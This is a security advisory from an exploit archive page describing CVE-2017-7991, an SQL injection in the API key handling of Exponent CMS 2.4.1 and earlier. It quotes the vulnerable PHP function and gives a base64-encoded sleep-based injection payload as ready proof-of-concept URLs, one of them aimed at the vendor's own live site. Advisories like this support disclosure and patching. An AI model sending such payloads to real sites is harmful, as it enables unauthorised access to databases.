what you don't know can hurt you

Exponent CMS 2.4.1 SQL Injection

Exponent CMS 2.4.1 SQL Injection
Posted Apr 21, 2017
Authored by 404 Not Found

Exponent CMS versions 2.4.1 and below suffer from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
advisories | CVE-2017-7991
MD5 | 8fc45c6470c515d4326185e4b391a80c

Exponent CMS 2.4.1 SQL Injection

Change Mirror Download
CVE-2017-7991-SQL injection-Exponent CMS

[Suggested description]
Exponent CMS 2.4.1 and earlier has SQL injection via a base64
serialized API key (apikey parameter) in the api function of
framework/modules/eaas/controllers/eaasController.php.

------------------------------------------

[Additional Information]
Vulnerable file is: /framework/modules/eaas/controllers/eaasController.php
Vulnerable function is api.

public function api() {
if (empty($this->params['apikey'])) {
$_REQUEST['apikey'] = true; // set this to force an ajax reply
$ar = new expAjaxReply(550, 'Permission Denied', 'You need an API key in order to access Exponent as a Service', null);
$ar->send(); //FIXME this doesn't seem to work correctly in this scenario
} else {
echo $this->params['apikey'];
$key = expUnserialize(base64_decode(urldecode($this->params['apikey'])));
echo $key;

$cfg = new expConfig($key);
$this->config = $cfg->config;
if(empty($cfg->id)) {
$ar = new expAjaxReply(550, 'Permission Denied', 'Incorrect API key or Exponent as a Service module configuration missing', null);
$ar->send();
} else {
if (!empty($this->params['get'])) {
$this->handleRequest();
} else {
$ar = new expAjaxReply(200, 'ok', 'Your API key is working, no data requested', null);
$ar->send();
}
}
}
}

We can control param $apikey by using base64_encode and serialize
functions to encrypt the SQL injection string. Then, the $apikey will
be decrypted and cause SQL injection. Such as, if we want to use
"aaa\'or sleep(2)#" to inject, we should use "echo
base64_encode(serialize($apikey));" to encrypt the Attack string:
czoxNjoiYWFhJ29yIHNsZWVwKDIpIyI7 is the result. So,
http://localhost:88/exponent/index.php?module=eaas&action=api&apikey=czoxNjoiYWFhJ29yIHNsZWVwKDIpIyI7
is the PoC. The result is: the site will sleep several seconds, and
you can see SQL injection is successful in MySQL logs.

------------------------------------------

[Vulnerability Type]
SQL Injection

------------------------------------------

[Vendor of Product]
Exponent CMS

------------------------------------------

[Affected Product Code Base]
Exponent CMS - 2.4.1 and earlier

------------------------------------------

[Affected Component]
\framework\modules\eaas\controllers\eaasController.php,function api(),param $apikey

------------------------------------------

[Attack Type]
Remote

------------------------------------------

[Impact Information Disclosure]
true

------------------------------------------

[Attack Vectors]
http://localhost:88/exponent/index.php?module=eaas&action=api&apikey=czoxNjoiYWFhJ29yIHNsZWVwKDIpIyI7

http://www.exponentcms.org/index.php?module=eaas&action=api&apikey=czoxNjoiYWFhJ29yIHNsZWVwKDIpIyI7

------------------------------------------

[Discoverer]
404notfound


Login or Register to add favorites

File Archive:

July 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    15 Files
  • 2
    Jul 2nd
    19 Files
  • 3
    Jul 3rd
    11 Files
  • 4
    Jul 4th
    0 Files
  • 5
    Jul 5th
    0 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    0 Files
  • 9
    Jul 9th
    0 Files
  • 10
    Jul 10th
    0 Files
  • 11
    Jul 11th
    0 Files
  • 12
    Jul 12th
    0 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close